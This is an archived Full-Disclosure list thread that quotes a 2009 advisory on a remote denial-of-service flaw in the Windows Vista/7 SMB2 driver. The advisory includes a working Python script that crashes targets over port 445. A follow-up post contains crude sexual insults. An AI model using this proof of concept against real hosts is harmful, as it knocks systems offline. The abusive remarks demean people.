Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 How come all I hear about is n3td3v, and I see noone crying out lout about this : http://www.reversemode.com/index.php?option=com_mamblogItemid=15ta sk=showaction=viewid=64Itemid=15 is fd all 'bout trolls nao? - -- = - - Release date: September 7th, 2009 - - Discovered by: Laurent GaffiƩ - - Severity: Medium/High = I. VULNERABILITY - - Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. II. BACKGROUND - - Windows vista and newer Windows comes with a new SMB version named SMB2. See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S erver_Message_Block_2.0 for more details. III. DESCRIPTION - - SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used to identify the SMB dialect that will be used for futher communication. IV. PROOF OF CONCEPT - - Smb-Bsod.py: #!/usr/bin/python # When SMB2.0 recieve a char in the Process Id High SMB header field it dies with a # PAGE_FAULT_IN_NONPAGED_AREA from socket import socket from time import sleep host = IP_ADDR, 445 buff = ( \x00\x00\x00\x90 # Begin SMB header: Session message \xff\x53\x4d\x42 # Server Component: SMB \x72\x00\x00\x00 # Negociate Protocol \x00\x18\x53\xc8 # Operation 0x18 sub 0xc853 \x00\x26# Process ID High: -- :) normal value should be \x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe \x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54 \x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31 \x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00 \x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57 \x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61 \x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c \x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c \x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e \x30\x30\x32\x00 ) s = socket() s.connect(host) s.send(buff) s.close() V. BUSINESS IMPACT - - An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable. Windows Xp, 2k, are NOT affected as they dont have this driver. VI. SYSTEMS AFFECTED - - Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server 2008 as it use the same SMB2.0 driver (not tested). VII. SOLUTION - - Vendor contacted, but no patch available for the moment. Close SMB feature and ports, until a patch is provided. VIII. REFERENCES - - http://microsoft.com IX. CREDITS - - This vulnerability has been discovered by Laurent GaffiƩ Laurent.gaffie{remove-this}(at)gmail.com http://g-laurent.blogspot.com/ X. LEGAL NOTICES - - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC 6kWcu5Q= =MjSD -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This is n3td3v and Gary McKinnon's lawyer. My client's have asburger syndrome.
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hey, buddy, you know spam filters sometimes can be stupid. Don't implement a stupid filter in your head. Just because I mention a troll in my email, have a hushmail address, and post a link you assume I must be rickrolling you or something? I was really surprised when I heard that Gaffie's remote DoS could infact be remote code exec. Not a mention here, unless I missed something. That's the link I posted, and since I don't understand shit to asm, I was expecting some feedback. BTW, this is not a flame, but sice you assumed I was trolling, I just wanted to make clear I was providing info, and waiting for feedback on it. PS : I use hush as disposable addresses, and it's none of your business. And I don't mind my sister sleeping around, she's just a whore anyway. - -- Does anybody care? In fact does anybody who contributes anything useful to this list use Hushmail? (at this time I am too lazy to look). If not I can set my spam filter. Amusing as it has been, it has grown tiresome. btw mr lawyer/mr random guy etc. my dick is bigger than yours, at least that's what your wife and sister tell me ;-) I am a noob with skills marginally better (debatable) than the average spotty first line support analyst. Therefore constructive criticism is welcomed, anything else is ignored unless I am bored or stupid enough to read/repond these postings after a bottle of Shiraz. regards the learner aka MrX ps I wish I didn't have so much to learn. -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkqoBUAACgkQRVBSp0SbIgej/QP/TfHJGc1k9EsuyMWfEIzLlC1RO1p0 wn34XeBrO/TzHCgam2jhMGSitbtOtOOGjLKyF+gBXGLaFwFDXh/dZamHtrDFLQGdzX2/ u7N5rkOSeiAmUys2K5h1iMMcohUlBpaLvsB9XrqBe1Oq3MFHV+H5NYusZlw1gFXNk0y6 qBRkqZE= =ymH2 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/